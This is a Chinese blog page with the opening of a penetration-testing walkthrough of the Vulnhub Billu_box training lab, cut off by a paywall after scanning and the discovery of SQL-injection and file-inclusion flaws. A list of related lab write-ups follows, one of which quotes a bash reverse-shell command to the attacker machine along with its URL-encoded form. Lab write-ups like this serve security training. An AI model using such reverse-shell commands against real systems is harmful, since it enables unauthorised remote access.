Vulnhub靶场渗透Billu_box

最新推荐文章于 2025-03-21 22:33:25 发布
原创 最新推荐文章于 2025-03-21 22:33:25 发布 · 388 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql #安全

本文详述了一次靶机攻防演练的过程,从端口扫描、目录遍历到发现SQL注入、文件包含漏洞。利用phpmyadmin数据库获取登录凭证,构造图片马执行命令获取shell,最后通过Ubuntu本地提权脚本成功提权至root。总结了SQL注入的payload技巧和提权方法。

靶机说明

难度中等
目标:从web应用程序获得 root权限
运行环境:靶机ip(192.168.110.127)攻击机kali(192.168.110.128)

信息收集

常规简单的端口扫描,目录扫描
在这里插入图片描述
在这里插入图片描述

漏洞挖掘

访问 80端口,打开提示是 SQL注入
在这里插入图片描述
简单万能密码试了一下不行,丢sqlmap也没跑出来暂时就不管他了
把上面扫出来的目录挨个打开

in.php 里面是 phpinfo()
add.php 是一个上传页面
phpmy 是 phpmyadmin登录页
test.php 是一个 测试页面,存在文件包含漏洞
在这里插入图片描述
没有传 file参数,经测试是 post传一个 file参数可以包含文件

最低0.47元/天 解锁文章
海贼王渗透靶场 Vulnhub:Billu_Box
qq_47168481的博客
09-26 941
海贼王渗透靶场
vulnhub(billu_b0x)实验
m0_49336519的博客
09-16 381
vulnhub(billu_b0x)实验 环境搭建 靶机下载地址 https://download.vulnhub.com/billu/Billu_b0x.zip 环境配置 1.靶机(billu_box) 2.攻击机(kali,win7) 3.靶机和攻击机都设置NAT模式 攻击演示 获取靶机IP 使用nmap扫描NAT网段上线的主机:nmap -sP 192.168.1.0/24 端口扫描 通过端口扫描发现服务器开放的服务信息 访问web站点 发现sql注入(靶机提示) sql注入测试 1.通过
Billu_box渗透测试
Darklord.W
04-11 905
Billu_box渗透测试 0x00实验环境 靶机:Billu_boxIP地址:192.168.8.207 测试机:Kali,IP地址:192.168.8.145; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 netdiscover主机发现 Masscan 及nmap扫描 进入web界面 首先,扫描web目录: 得到:...
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1161
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
vulnhub-Billu_b0x(getshell成功)
qq_43006864的博客
03-29 1792
这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟 上面一篇文章开始。 开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...
VulnHub实战篇一:Billu_Box靶机渗透记录
a1004070060的博客
03-31 2123
0x00前言 由于2020年疫情原因,被迫宅家已有两个月之久,假期里边摸鱼边学习也浪费了不少时光。感叹光阴似箭的同时,临近毕业也加倍地感受到就业的压力。最近听了某位OSCP大佬的安利,决定开始拿VulnHub练练手。 本系列文章用来记录VulnHunb靶机的渗透过程,欢迎各位师傅讨论学习。 0x01靶机信息 靶机名称:Billu_b0x 下载地址:https://downloa...
vulnhub靶场billu系列】之billu_b0x2靶机
最新发布
China_I_LOVE的博客
03-21 615
该靶机主要考察点在于的检测与使用,主要就是poc的构造,这里要清楚的知道。
Vulnhub靶机 Billu_b0x(渗透测试详解)
2301_80358831的博客
12-01 1462
Vulnhub靶机 Billu_b0x(渗透测试详解)
Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub
qq_35664104的博客
10-03 1863
本次来试玩一下vulnhub上的Billu_b0x2,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP win7: 192.168.31.44 kali: 192.168.31.17 靶机: 192.168.31.132 信息搜集 主机发现得到靶机ip,接着进行端口扫描 nmap -sV -A -p- 192.168.31.132 开放了22, 80,
vulnhub——BILLU: B0X
weixin_54431413的博客
05-31 519
第一个思路主要是来利用sql注入,文件上传和文件包含漏洞结合来拿到shell,之后利用内核漏洞提权 第二个思路主要是对目标靶机进行了完整的信息收集,拿到更多了信息,利用了文件下载漏洞,拿到了root的密码,直接利用ssh登录目标服务器
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1644
vulnhub ai-web1.0
Billu_box靶场实战演练
weixin_52049485的博客
01-05 829
部署环境 虚拟机:Kali ip:192.168.202.138 靶机:Billu_box ip:192.168.202.140 信息收集 1、通过nmap扫描发现靶机 ip地址:192.168.202.140 开放了22、80端口 中间件:Apache/2.2.22 (Ubuntu) 操作系统:Linux 2、通过Kali自带的DIRB工具+字典扫描目录 漏洞发现 通过目录扫描发现了phpinfo** phpmyadmin界面,注意的是扫描目录为“phpmy” 发现“file”内容的网址,发现任意
渗透练习 Vulnhub靶场 Tornado
hljzzj的博客
02-15 2401
No.27 Tornado 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-tornado,639/ 靶场: VulnHub.com 靶机名称: IA: Tornado 难度: 中等 发布时间: 2020年12月20日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -
【甄选靶场Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权)
人间体佐菲的博客
10-02 1543
Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权) 信息安全,网络安全渗透测试
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1898
vulnhub靶机AI-Web-1.0渗透笔记
web狗日记之vulnhub-JIS靶场
梦之序章的博客
04-10 873
web狗日记 4月10日 晴 今天在vulnhub下载了个靶场,被领导看见了,我急忙解释是用来消磨时间的,领导微微一笑对我说:有时间的人不适合做渗透。 咳咳,其实本人也不怎么打ctf,只是最近该准备的也差不多了,拿一些靶场临阵磨磨枪。之前没打过vulnhub的,所以随便找了个不是那么无情的靶场试试看。入正题先: 在vunlhub官网下载后,ovf导入vmware中,我第一次导入没有分配ip。这个解...
vulnhub_内网渗透测试的记录——网络安全
yz_weixiao的博客
01-03 702
这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。
vulnhub靶场AI-WEB-1.0
qq_42307546的博客
05-03 702
靶机下载地址 https://download.vulnhub.com/aiweb/AI-Web-1.0.7z 主机探测 netdiscover -i eth0 -r 192.168.1.0/24 端口探测 nmap -p 1-65535 -sC -sV 192.168.1.14 开启了80端口访问 web目录爆破 gobuster dir -u http://192.168.1.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-m
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 8035
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
入门靶场Billu_b0x:Web渗透学习与实践
"Billu_b0x靶机练习是一个适合初学者的Web渗透入门实践,旨在帮助用户了解基本的Web渗透流程。通过该靶场,用户可以锻炼自己的技能,包括主机发现、端口扫描和信息收集等。文章作者作为小白,分享了其学习过程中的...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值